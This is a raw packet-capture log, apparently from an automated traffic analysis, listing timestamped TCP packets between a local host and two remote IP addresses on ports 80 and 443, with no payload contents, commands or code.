                                                                                                                                                                                                Nov 24, 2024 03:04:32.736232042 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.736259937 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.737341881 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.737395048 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.737451077 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.738581896 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.738686085 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.738713980 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.739733934 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.739778042 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.739826918 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.740952015 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.740998983 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.741023064 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.742145061 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.742219925 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.742860079 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.743352890 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.743412018 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.743451118 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.744539976 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.744594097 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.744618893 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.745749950 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.745800018 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.745814085 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.746911049 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.746952057 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.747104883 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.747333050 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.748117924 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.748169899 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.748228073 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.749315977 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.749392986 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.749403954 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.750499964 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.750622034 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.750633955 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.751710892 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.751825094 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.751833916 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.752890110 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.753000021 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.754091978 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.754139900 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.754159927 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.755266905 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.755384922 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.755424023 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.756465912 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.756570101 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.757656097 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.757674932 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.757714987 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.757772923 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.758896112 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.758919001 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.758959055 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.760075092 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.760118961 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.760181904 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.761240959 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.761368990 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.761404037 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.762463093 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.762509108 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.762571096 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.763693094 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.763731956 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.763772964 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.764853954 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.764920950 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.764951944 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.766082048 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.766124964 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.766172886 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.767252922 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.767301083 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.767395020 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.768452883 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.768493891 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.768549919 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.769649029 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.769736052 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.770843983 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.770879030 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.770940065 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.772051096 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.772151947 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.772197962 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.773243904 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.773293018 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.773322105 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.774426937 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.774468899 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.774518967 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.775631905 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.775728941 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.775763035 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.776813030 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.776856899 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.776910067 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.778017998 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.778029919 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.778053999 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.779227018 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.779266119 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.779376030 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.780414104 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.780445099 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.780519009 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.781615019 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.781706095 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.781759977 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.782825947 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.782887936 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.782943010 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.784097910 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.784210920 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.784782887 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.849315882 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.852588892 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:32.852622986 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.890315056 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.890360117 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.890414953 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.890836000 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.890953064 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.891000986 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.892033100 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.892155886 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.892199993 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.893213034 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.927479982 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.927596092 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.927659035 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.927985907 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.928090096 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.928119898 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.929249048 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.929339886 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.929387093 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.930376053 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.930496931 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.930556059 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.931569099 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.931687117 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.931750059 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.932784081 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.932887077 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.932936907 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.933944941 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.934086084 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.934140921 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.935156107 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.935282946 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.935337067 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.936357975 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.936480045 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.936537981 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.937541008 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.937653065 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.937707901 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.938745022 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.938852072 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.938908100 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.939920902 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.939979076 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.940032005 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.941128969 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.941190004 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.941242933 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.942323923 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.942383051 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.942437887 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.943526983 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.943620920 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.943650961 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.944749117 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.944850922 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.944907904 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.945939064 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.945993900 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.946029902 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.947129965 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.947213888 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.947256088 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.948354959 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.948427916 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.948554039 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.949558020 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.949665070 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.949702024 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.950709105 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.950820923 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.951268911 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.951920033 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.952016115 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.952307940 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.953125000 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.953227997 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.953283072 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.954317093 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.954377890 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.954411030 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.955518007 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.955656052 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.955699921 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.956692934 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.956799984 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.956856966 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.957943916 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.958024025 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.958087921 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.959088087 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.959223986 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.959279060 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.960288048 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.960403919 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.960413933 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.961479902 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.961594105 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.961636066 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.962667942 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.962804079 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.962853909 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.963885069 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.963979006 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.964024067 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.965056896 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.965212107 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.965255022 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.966268063 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.966378927 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.966430902 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.967478991 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.967585087 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.967639923 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.968682051 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.968801022 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.968806982 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.969757080 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.969841957 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.969952106 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.969991922 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.971070051 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.971144915 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.971175909 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.972232103 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.972305059 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.972347975 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.973475933 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.973556995 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.973645926 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.974260092 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:32.974288940 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.974673033 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.974764109 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.974773884 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.975864887 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.975953102 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.975976944 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.977030039 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.977140903 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.977216959 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.978224039 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.978346109 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.978427887 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.978626013 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:32.979414940 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.979484081 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.979526043 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.980642080 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.980720997 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.980735064 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.981800079 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.981915951 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.981930017 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.983025074 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.983124971 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.984200001 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.984261036 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.984303951 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.985393047 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.985745907 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.985810995 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.997561932 CET4972980192.168.2.5185.215.113.16
